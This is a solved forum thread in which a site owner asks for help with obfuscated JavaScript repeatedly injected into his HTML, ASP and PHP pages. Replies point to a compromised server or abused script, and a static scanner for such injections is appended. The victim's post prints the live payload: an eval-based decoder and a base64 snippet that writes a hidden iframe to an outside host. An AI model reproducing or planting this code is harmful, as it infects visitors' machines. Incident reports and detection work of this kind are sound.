• Status: Solved

Injecting JavaScript code in webpage after body tag, which downloads malicious script into system

I don't know what's happening with my web server and websites. Somebody is injecting some JavaScript code into the webpages after the body tag. When someone tries to open the website, it downloads the scripts and injects them into the system. I tried deleting all the hosted websites and uploading them again, but no luck.
Could someone advise me on this?
Here is the sample code of that JavaScript:
<script language=JavaScript> function aiwpbn15(p){var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,4,50,23,48,53,51,42,20,49,0,0,0,0,0,0,44,54,58,19,27,10,37,2,18,13,39,40,22,12,56,29,14,41,30,61,11,33,21,34,3,16,5,0,0,0,0,38,0,62,9,47,28,31,25,43,32,36,7,8,6,35,15,17,1,0,45,26,60,59,46,52,57,55,24);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(174^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}aiwpbn15('feM4EjdAqArAngSAOnfW7jM4TJzFEjd6Dnt2qgIhf6S9sc@UbEx9k6S6Xc@mq0t4TnbJRWMJIuzydytiMs@AsuIFplN6EgthIjM4scM4snk6Gjd6ZXk4TgOhsjzibLNNngr9q2O4DX@2lPa6sDMhd0M4Ejt4lRkUOWQJLBxUZ_kJRWMJIJzUb2Kmfe@2sDtisvxJPst2jJ@9snQFRBzyser4TnbmEedyRTt63Cb4pXt2MGQipRM2d0t4TXfWjG')	</script><!-- makemecharming.com --><script type="text/javascript">
eval("function _g_u(t){var k='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o='';var q,w,e;var a,s,d,f;var i=0;do{a = k.indexOf(t.charAt(i++));s=k.indexOf(t.charAt(i++));d=k.indexOf(t.charAt(i++));f=k.indexOf(t.charAt(i++));q=(a << 2) | (s >> 4);w=((s & 15) << 4) | (d >> 2);e=((d & 3) << 6) | f;o=o+String.fromCharCode(q);if(d!=64) o=o+String.fromCharCode(w); if(f!=64) o=o+String.fromCharCode(e);} while(i<t.length);document.write(o);};_g_u('PElGUkFNRSBTUkM9Imh0dHA6Ly90cmFmZmEuaW5mby9pbWcvc3R5bGUvc3R5bGUucGhwIiBXSURUSD0wIEhFSUdIVD0wPjwvSUZSQU1FPg==');");
</script>

itindia
Asked:
2 Solutions
 
silemone Commented:
When you say someone, do you mean your web host or another programmer?
0
 
itindia (Author) Commented:
Thanks for the quick reply! But I don't know who the culprit is, as I am the only person who has access to the websites. By "someone" I meant that there could be a hijacker, or maybe some virus that has attacked my websites.
0
 
Tony McCreath, Technical SEO Consultant, Commented:
Is the injected code directly in an HTML file on the server? i.e. is it being directly changed on the server?

It could be related to the iframe attack...

http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml

It's initially based on finding a password to access the server. From there it alters website pages to do bad things.

0
 
itindia (Author) Commented:
Yes Tiggerito, it's directly injected on the server; no user modification has been done. It's spreading the code into all HTML, ASP and PHP files located on the server in which the body tag exists. Basically it's a virus. If someone opens the website, that code executes, points to another URL and makes your PC unresponsive.

There's no way you can stop it except to press ESC before it executes, or you have to do a system restore.

I keep removing the code from the files, but after some days the same thing happens.

0
 
Tony McCreath, Technical SEO Consultant, Commented:
If it is actual files on the server that are being modified then I suspect someone or something has acquired access to your server.

You will need to close the hole that keeps letting them in, and clean up the system from any hacks or viruses.



0
 
DrAtomic Commented:
Most likely your server isn't compromised but one of your scripts is being abused; the abused script will have access to all files under the same user account. Start by giving each domain its own user and isolate the abused website that way, unless you are 100% sure that it's being done on the server itself, then apply Tiggerito's suggestion.
0
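
A defensive sketch for the cleanup step discussed in this thread, added here as an example and not code from any of the posters: it walks a web root, flags `<script>` blocks in HTML, ASP and PHP files that call `eval(` alongside a long encoded string literal, and statically base64-decodes those literals (never executing them) to surface zero-size iframes. The function names, the 40-character threshold and the sample page are assumptions made for illustration.

```python
import base64
import binascii
import re
from pathlib import Path

WEB_EXTS = {".html", ".htm", ".asp", ".php"}  # file types named in the thread
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
LITERAL_RE = re.compile(r"""['"]([^\s'"]{40,})['"]""")  # long unbroken string literal
ZERO_IFRAME_RE = re.compile(r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0\b[^>]*>", re.I)

def decode_base64(literal):
    """Decode a literal as strict base64 without executing anything; None if it is not base64."""
    try:
        return base64.b64decode(literal, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None

def scan_text(text):
    """Return (finding, detail) pairs for every suspicious <script> block in one file."""
    findings = []
    for match in SCRIPT_RE.finditer(text):
        body = match.group(1)
        literals = LITERAL_RE.findall(body)
        if "eval(" not in body or not literals:
            continue
        findings.append(("eval-with-encoded-literal", literals[0][:32]))
        for literal in literals:
            decoded = decode_base64(literal) or ""
            for tag in ZERO_IFRAME_RE.findall(decoded):
                findings.append(("hidden-iframe", tag))
    return findings

def scan_tree(root):
    """Scan every web file under root; return {relative path: findings} for flagged files."""
    flagged = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                flagged[str(path.relative_to(root))] = hits
    return flagged

# Constructed sample, not the payload from the thread: a benign hidden iframe, base64-wrapped.
SAMPLE_TAG = '<IFRAME SRC="http://example.invalid/x.php" WIDTH=0 HEIGHT=0></IFRAME>'
SAMPLE_PAGE = ("<html><body><p>hello</p></body>\n<script>eval(\"_g_u('"
               + base64.b64encode(SAMPLE_TAG.encode()).decode() + "');\");</script></html>")

if __name__ == "__main__":
    print(scan_text(SAMPLE_PAGE))
```

Running `scan_tree` against a known-clean copy of the site first shows which legitimate scripts trip the heuristic, so that recurring hits after a cleanup stand out.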
